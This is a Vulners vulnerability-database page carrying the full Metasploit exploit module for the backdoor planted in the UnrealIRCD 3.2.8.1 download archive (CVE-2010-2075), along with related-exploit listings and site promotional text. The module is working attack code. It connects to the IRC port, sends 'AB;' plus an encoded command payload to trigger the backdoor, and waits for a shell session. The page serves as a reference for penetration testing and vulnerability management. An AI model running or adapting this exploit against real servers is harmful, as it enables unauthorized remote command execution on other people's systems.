Lucene search
K

UnrealIRCD 3.2.8.1 Backdoor Command Execution

🗓️ 12 Jun 2010 19:25:48Reported by hdm <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 184 Views

UnrealIRCD 3.2.8.1 Backdoor Command Execution. Exploits malicious backdoor in Unreal IRCD 3.2.8.1 download archive present between November 2009 and June 12th 2010

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
nmap-enumeration-lab
8 Jul 202603:49
githubexploit
GithubExploit
Exploit for Improper Input Validation in Unrealircd
16 Apr 202619:45
githubexploit
GithubExploit
nessus-metasploit-pentest
29 May 202612:03
githubexploit
GithubExploit
Exploit for Improper Input Validation in Unrealircd
5 Jun 202612:51
githubexploit
GithubExploit
Exploit for Improper Input Validation in Unrealircd
2 Feb 202615:30
githubexploit
GithubExploit
System-Exploitation-Compromising
2 Jun 202622:49
githubexploit
GithubExploit
pentest-metasploit
24 Jun 202617:10
githubexploit
GithubExploit
Metasploit2-pentest
6 Jun 202623:31
githubexploit
Information Security Automation
Vulnerability Management at Tinkoff Fintech School
4 Mar 201910:38
avleonov
Circl
CVE-2010-2075
13 Jun 201000:00
circl
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'UnrealIRCD 3.2.8.1 Backdoor Command Execution',
      'Description'    => %q{
          This module exploits a malicious backdoor that was added to the
        Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the
        Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2010-2075' ],
          [ 'OSVDB', '65445' ],
          [ 'URL', 'http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt' ]
        ],
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 1024,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl ruby telnet',
            }
        },
      'Targets'        =>
        [
          [ 'Automatic Target', { }]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2010-06-12'))

    register_options(
      [
        Opt::RPORT(6667)
      ])
  end

  def exploit
    connect

    print_status("Connected to #{rhost}:#{rport}...")
    banner = sock.get_once(-1, 30)
    banner.to_s.split("\n").each do |line|
      print_line("    #{line}")
    end

    print_status("Sending backdoor command...")
    sock.put("AB;" + payload.encoded + "\n")

    # Wait for the request to be handled
    1.upto(120) do
      break if session_created?
      select(nil, nil, nil, 0.25)
      handler()
    end
    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
0.3Low risk
Vulners AI Score0.3
CVSS 27.5
EPSS0.83534
184